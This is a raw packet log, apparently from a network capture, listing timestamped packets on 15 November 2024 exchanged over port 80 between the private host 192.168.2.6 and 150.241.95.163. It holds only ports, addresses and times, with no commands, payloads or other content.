Nov 15, 2024 10:36:01.313622952 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.334472895 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.334587097 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.334597111 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.334614992 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.334630966 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.334641933 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.334651947 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.334661961 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.334659100 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.334671974 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.334682941 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.334692955 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.334717035 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.334717035 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.335293055 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.335304022 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.335321903 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.335355043 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.335360050 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.335371971 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.335381985 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.335390091 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.335392952 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.335418940 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.335438967 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.335454941 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.335465908 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.335486889 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.335510969 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.354886055 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.354898930 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.354990005 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.357053995 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.357068062 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.357096910 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.357109070 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.357122898 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.357125998 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.357177973 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.357198954 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.357212067 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.357228041 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.357255936 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.357314110 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.357326984 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.357337952 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.357355118 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.357378006 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.357522964 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.357534885 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.357543945 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.357589960 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.357614040 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.357625008 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.357635021 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.357642889 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.357654095 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.357655048 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.357692003 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.357717991 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.358031988 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.358043909 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.358052969 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.358089924 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.391711950 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.391747952 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.391765118 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.391777039 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.391786098 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.391798973 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.391830921 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.391835928 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.391843081 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.391854048 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.391864061 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.391875029 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.391886950 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.391911983 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.391947031 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.391958952 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.391968966 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.391984940 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.392003059 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.392102003 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.392159939 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.392169952 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.392200947 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.392234087 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.392266035 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.392277002 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.392287970 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.392316103 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.392324924 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.392508030 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.392541885 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.392553091 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.392564058 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.392606974 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.392620087 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.392631054 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.392641068 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.392652035 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.392666101 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.392683029 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.392792940 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.392803907 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.392816067 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.392831087 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.392839909 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.392841101 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.392852068 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.392890930 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.392914057 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.393467903 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.393479109 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.393488884 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.393531084 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.411472082 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.411499023 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.411515951 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.411525011 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.411535025 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.411545038 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.411545992 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.411556959 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.411602020 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.411621094 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.411706924 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.411715984 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.411750078 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.411792040 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.411803961 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.411813021 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.411849022 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.411942005 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.411952972 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.411961079 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.411982059 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.412002087 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.412065029 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.412133932 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.412142992 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.412151098 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.412167072 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.412203074 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.412259102 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.412269115 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.412277937 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.412297010 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.412369013 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.412405968 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.412412882 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.412488937 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.412522078 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.412796021 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.413626909 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.413662910 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.413676023 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.413695097 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.413719893 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.413728952 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.413738966 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.413750887 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.413773060 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.413868904 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.413906097 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.413963079 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.413973093 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.413984060 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.413995028 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.414005041 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.414027929 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.416227102 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.416239023 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.416249037 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.416285992 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.416296959 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.416312933 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.416342020 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.451683998 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.451704979 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.451714039 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.451719999 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.451725006 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.451788902 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.451812983 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.451832056 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.451844931 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.451875925 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.451884985 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.451895952 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.451925039 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.452033043 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.452056885 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.452065945 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.452074051 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.452109098 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.452188969 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.452250957 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.452263117 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.452271938 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.452289104 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.452313900 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.452450037 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.452469110 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.452480078 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.452488899 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.452507973 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.452536106 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.465637922 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.474060059 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.474069118 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.474097013 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.474153996 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.474164009 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.474173069 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.474237919 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.474237919 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.474237919 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.474302053 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.474315882 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.474325895 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.474335909 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.474361897 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.474383116 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.474489927 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.474541903 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.474554062 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.474579096 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.474591017 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.474591970 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.474603891 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.474622011 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.474638939 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.474879980 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.474909067 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.474917889 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.474951029 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.474960089 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.474972010 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.474997997 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.475167990 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.475189924 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.475199938 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.475208044 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.475239038 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.508920908 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.508955956 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.508968115 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.509015083 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.509076118 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.509085894 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.509092093 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.509097099 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.509108067 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.509118080 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.509140968 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.509144068 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.509155989 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.509171009 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.509190083 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.509329081 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.509354115 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.509362936 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.509387970 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.509428978 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.509466887 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.509700060 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.509722948 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.509733915 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.509763002 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.509804964 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.509816885 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.509826899 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.509845972 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.509865999 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.509929895 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.509941101 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.509949923 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.509985924 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.510042906 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.510054111 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.510063887 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.510072947 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.510082960 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.510083914 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.510093927 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.510103941 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.510113955 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.510129929 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.510139942 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.510538101 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.510550022 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.510559082 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.510610104 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.510637045 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.510648012 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.510657072 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.510673046 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.510677099 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.510689974 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.510699034 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.510701895 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.510726929 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.528708935 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.528733969 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.528744936 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.528783083 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.528789043 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.528800964 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.528814077 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.528845072 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.528856993 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.528969049 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.528978109 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.528987885 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.528999090 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.529009104 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.529011965 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.529027939 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.529047012 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.529191017 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.529201984 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.529215097 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.529236078 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.529246092 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.529247046 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.529284000 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.529433966 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.529472113 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.529479027 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.529483080 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.529515982 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.529593945 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.529616117 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.529624939 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.529648066 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.531619072 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.531629086 CET	80	49741	150.241.95.163	192.168.2.6
